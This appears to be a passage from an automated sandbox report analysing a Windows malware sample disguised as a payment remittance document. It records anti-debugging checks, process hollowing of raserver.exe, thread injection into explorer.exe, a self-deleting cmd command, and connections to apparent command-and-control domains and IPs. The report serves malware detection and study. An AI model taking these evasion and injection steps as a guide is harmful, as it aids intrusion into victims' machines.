          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04770050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04770050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04824015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04824015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04812073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04821074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_048149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04774120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04774120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04774120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04774120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04774120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047E41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0479927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047E4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04759240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04794A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04794A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04755210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04755210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04755210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04755210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04773A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04768A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0480B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0480B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04828A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0480D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04783B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04783B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04825BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04784BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04784BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04784BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04828B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04761B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04761B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Code function: 5_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Domain query: www.yummyblockparty.com
          Source: C:\Windows\explorer.exe Domain query: www.fitotec.net
          Source: C:\Windows\explorer.exe Domain query: www.johnharrisagent.com
          Source: C:\Windows\explorer.exe Domain query: www.btt5204.com
          Source: C:\Windows\explorer.exe Network Connect: 52.71.133.130 80
          Source: C:\Windows\explorer.exe Domain query: www.hide.osaka
          Source: C:\Windows\explorer.exe Network Connect: 198.54.117.211 80
          Source: C:\Windows\explorer.exe Network Connect: 103.15.104.66 80
          Source: C:\Windows\explorer.exe Network Connect: 198.54.117.215 80
          Source: C:\Windows\explorer.exe Domain query: www.itsready.support
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: C30000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread register set: target process: 3388
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3388
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess created: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
          Source: explorer.exe, 00000006.00000000.260179688.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000006.00000000.229448758.0000000001980000.00000002.00020000.sdmp, raserver.exe, 00000013.00000002.476913226.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.250393211.0000000006860000.00000004.00000001.sdmp, raserver.exe, 00000013.00000002.476913226.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.229448758.0000000001980000.00000002.00020000.sdmp, raserver.exe, 00000013.00000002.476913226.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.229448758.0000000001980000.00000002.00020000.sdmp, raserver.exe, 00000013.00000002.476913226.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
